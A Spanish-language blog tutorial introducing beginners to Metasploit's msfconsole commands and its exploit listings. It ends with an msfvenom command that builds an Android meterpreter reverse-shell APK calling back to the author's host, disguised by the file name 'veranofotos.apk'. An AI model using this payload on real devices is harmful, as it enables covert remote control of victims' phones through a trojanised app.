stereomatic

Sin duda una de las herramientas mas importantes en la actualidad Metasploit framework es una suit de ataque y generacion de exploits y multiplicidad de herramientas en una interfaz de consola que nos sirve para realizar pruebas de penetracion a computadoras y sistemas informaticos para verificar vulneravilidades aqui les traigo un pequeño tutorial de comandos sencillos para los que van iniciando y pronto realizare unos con cosas mas avanzadas El escenario es una maquina con Kali 2.0 corei-3 SSD estado solido 128g y 6 g de RAM el primer comando inicando al consola desde kali msfconsle nos aparece al version 4.11.21 exploit 1533 payloads 438 auxiliares 893 encoders 38 nobs 8 post 264 esta muy completo el comando "banner" solo cambiara la imagen de incio a las multiples imagenes disponibles. el siguiente comando nos indicara las opciones disponibles "show options". Despues ya podemos hacer una busqueda avanzada de exploits por ejemplo"show exploits" tardara un poco y nos dara una lista mas extensa de los exploits disponibles. Aparece al lsita de exploits que afectan a OSX Windows Linux IOS Andorid .....1337..etc de izquierda a derecha nos dara -NAME el nombre del exploit -DISCLORSURE que es la fecha de lanzamiento -RANK que tan bueno es el exploit y que tan usado -DESCRIPTION el proceso que realiza o como afecta al equipo Tomaremos un ejemplo de uno para OSX osx/local/nfs_mount_root normal Mac OS X NFS Mount Privilege Escalation Exploit usamos el comando "info osx/local/nfs_mount_root " para revisarlos indivudualmente Igualmente podemos revisarlos mas detalladamente en la pagina oficial de Metasploit Donde nos aparecen los autores codigo fuente y toda al informacion rquerida para ver si el exploit es de nuestro agrado o de que manera se puede explotar mejor De igual manera podemos hacer una busqueda avanzada para buscar un sistema o una vulnerabilidad en especial en este caso "search android" Aparcera toda al lista disponible y combinadolo con el comando info podremos encontrar el mas adecuado a nuestras necesidades o al sistema que queremos comprometer Otro comando interesante es "?" que nos dara toda al lista de comandos de msfconsole y el comando "clear" nos permite borrar los comandos de consola. Por ultimo generaremos un exploit para android con una apk maliciosa y la pondremos en la ruta de nuestro escritorio "[email protected]:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.78 LPORT=555 R > /root/Escritorio/veranofotos.apk" dependiendo nuestra IP y el puerto que usemos tendremos que cambiar los rangos de IP y el numero de puerto. Ya hemos generado nuestra apk maliciosa y aparece en nuestro escritorio ya solo falta explotarla lo hare en otro post por que es necesario conocer bien lo que estamos haciendo , y ver que hay otros exploit ademas de "payload/windows/meterpreter/reverse_tcp"